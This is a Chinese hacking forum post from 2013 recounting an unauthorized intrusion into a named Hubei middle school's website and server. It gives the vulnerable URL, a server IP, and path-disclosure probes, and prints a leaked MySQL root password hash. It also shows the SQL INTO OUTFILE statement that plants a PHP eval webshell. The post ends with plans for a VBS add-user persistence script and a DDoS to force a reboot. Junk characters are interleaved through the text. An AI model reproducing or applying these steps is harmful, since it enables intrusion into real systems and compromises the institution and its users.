找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2901|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
) Y9 L# D, o! r: B" _发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!4 {0 g. @' V# J' _. K3 c& R
2 l! B9 F$ n% S) @0 k; c
/ C; {; M: `2 h2 _3 V
) M0 N* M; U5 A; V( [
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 2 W; ~+ I+ [2 \* U9 j4 n& C
! E, w# u' J# F$ V
那么想可以直接写入shell ,getshell有几个条件:) B4 ^8 w+ n1 ]4 W5 ^$ U! K
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF7 Y( u$ ~! S( k! c. b; H

2 |, _7 B7 ^5 X! f. L( i4 t试着爆绝对路径:
6 G7 L" R* H4 b: x1./phpMyAdmin/index.php?lang[]=1  . N" e- m1 ^3 L9 R
2./phpMyAdmin/phpinfo.php  0 J- K( J3 _& C) w6 B1 d, r
3./load_file()  
" v  Z3 q7 p8 b# v4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
+ e' m5 @, q) g6 ?5./phpmyadmin/libraries/select_lang.lib.php  
9 p6 D( V" y# v3 X# x; ?9 X5 t/ I6./phpmyadmin/libraries/lect_lang.lib.php  
7 @: w; x/ p3 I& O7./phpmyadmin/libraries/mcrypt.lib.php   3 {) D, Y8 Z& t9 S, N
8./phpmyadmin/libraries/export/xls.php  # d7 J# j* u, ~1 @: s- w) c

% b) Z, y# J; H# m! z/ z8 l' o$ K均不行...........................
% |4 r6 Y8 f& r, s3 b' X, ?% B* n, ?- ]$ X  v7 G; z
御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php
9 x; R# M  T  K) @. K4 Q
- H6 V# s& ~/ O; {- X* x权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
; `3 U0 s4 k- L4 H) O; a+ M6 [! {4 n; B* @
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
/ s: M; t2 J* R' L3 s' `7 H* U, \' g/ ?. f
敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........
+ b0 c) ]/ k& n8 ]
% M2 U, E7 G- q; H想想root还可以读,读到root密码进phpmyadmin 也可以拿shell 1 a9 J: t- [, A- Z1 s- U

/ Z) ^3 O1 t- h% l, a4 thttp://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini 1 h$ r& X, o3 m7 X
$ g, m2 W7 ~  C3 ?  \" U
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD ) j6 k4 ]& I- ?% f- J3 ]9 n0 z
; i0 H" \+ \& X) N# b/ _6 |
成功读到root密码:: u' L8 ]  p/ ]4 ]0 X& |. M* Q: y

! f8 H3 u# Z, w3 [17---- r(0072)
% n# j* @, J* a5 p18---- o(006f)
% y6 N! w% x& T# u8 v9 c8 ]& X. V19---- o(006f)' h( R- [$ s- m5 ?, z
20---- t(0074)+ M) @  t2 d4 m$ c
21---- *(002a)
# z+ |4 z& u/ U- F22---- 8(0038)
& l: D. y# u7 s3 i' _( e# v! J23---- 2(0032)
; G9 _& d7 ]$ v/ Q/ @24---- E(0045), f0 M# G$ J9 y/ C
25---- 1(0031)$ w$ ^3 P+ M/ y6 e" j8 P; k  U3 v
26---- C(0043)
& J; }' M/ _, C27---- 5(0035)
+ ]" k2 [$ _! A  Y# o28---- 8(0038)
: }- r1 Z2 ]4 m3 c29---- 2(0032)0 y, ?8 D, o4 E; u' b
30---- 8(0038)
5 y+ I" l4 t# H! q) X31---- A(0041)
2 n9 k7 n# W5 A; w32---- 9(0039). P6 X( G/ }/ Z  s. x
33---- B(0042)
" h5 ~' y! }" @0 P) I' ]. W. x34---- 5(0035), L6 ?/ D- y" v# N1 p
35---- 4(0034)- Q. }) N3 l4 P/ f
36---- 8(0038)
# j+ D1 j( l5 l. |# w3 P0 F) M& x  F37---- 6(0036)
5 w7 u  o! q0 U9 ~9 Z5 z* U  W38---- 4(0034); Z/ i% q5 k/ \! t$ d* F
39---- 9(0039)
: E! h, V! k. @: |9 \% C40---- 1(0031)
' \& f6 a1 W$ Z; F1 t41---- 1(0031)
( Z# T) O% n4 k- S" e7 a1 [& D42---- 5(0035)
' P" M  n/ `3 j# m* p. U43---- 3(0033)
, y. X" V, b& ]* C- H0 |44---- 5(0035)% _9 W# m0 }) Y# J$ O6 g& L* E. N
45---- 9(0039)' W0 Z' H  @( \: ]; [
46---- 8(0038): i6 B2 Q. Y3 |/ Q* y. b
47---- F(0046)" o/ X/ U+ Z3 m9 l) k3 ^- m+ m* L* ^
48---- F(0046)
3 O7 X* w0 a, U  |2 n2 t* z49---- 4(0034)2 R; p6 ^7 R7 g7 f
50---- F(0046)
% F; T+ p7 W% f51---- 0(0030)7 a) O. l) M% ~4 q
52---- 3(0033)1 K6 @2 h( l4 u& ^$ ?. k% b0 m* A6 \
53---- 2(0032)- j2 z. e  Y1 b6 _
54---- A(0041)% C' r* ~. n3 h
55---- 4(0034)
& }% z/ I7 f8 ^' e5 H9 L- }3 s56---- A(0041)( R" V; y6 P! t: y
57---- B(0042)
  y' P3 U, w! `0 h: Y7 Y# \1 ]( }58---- *(0044)
5 _4 \* Z' D' ?) B1 p59---- *(0035)* z. t6 L' [3 o. ^
60---- *(0041)8 S8 ?/ f8 l' t1 b' H) c0 @0 T7 Q
61---- *0032)
; z) H; }, i: D4 R& A3 |2 m% x6 X1 O4 o- ]/ Y3 l- U4 c4 d
解密后成功登陆phpmyamin* y  J: _) C7 {0 D, S& e
                          + C3 V. h1 E& |1 j7 A" p

4 W8 T: @0 w* t" m( u                             
7 S/ D) a" v) g  A! T! [/ s4 Q3 v7 q5 k! Y6 _9 N& H$ I% D( }5 ~/ V
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'3 ?1 z' n0 }7 d* M

* O' G0 ?  Q" @8 G成功执行,拿下shell,菜刀连接:
# f2 A& w% K+ {) j9 W0 T: j) U' V. g+ ?( N( ^
服务器不支持asp,aspx,php提权无果...................# R# M" L* v* R4 ?( o- x# C  \3 M

& K# O% z- U% }# Y; R9 u9 I4 h' @但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
0 m9 p8 J% i7 r& t) `3 @' ~
服务器上已经有个隐藏帐号了
/ W, B% Q. P1 D- e
别名     administrators3 |3 A' r7 u2 m4 c) N1 H
注释     管理员对计算机/域有不受限制的完全访问权

' Z4 Y. t# I  ?8 R5 t6 i# x# c( C
成员
- n5 g( o7 D  k7 {
-------------------------------------------------------------------------------
& a2 x+ E  a6 b8 b" O+ h- Q# s8 P% padmin
. j- b6 {0 p, U: C2 FAdministrator
9 ~4 W$ x! U# I+ jslipper$0 g) u! X( A1 M, l
sqluser& u* l; M9 j8 e/ l- g
命令成功完成。 9 e& ]3 a  ^& P& {( M

7 Z1 J) M: x! R4 A4 \. G服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。* d9 `) M6 b9 N" J+ e3 [" E: I
; [' r; m3 p( c- W
ddos服务器重启,不然就只能坐等服务器重启了...............................; C, b; r, G& |  k% n/ F, D
' n. b% I. M7 Z' }4 U5 m% B
      

: M! ?0 k0 V. s' v% e% u2 E

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表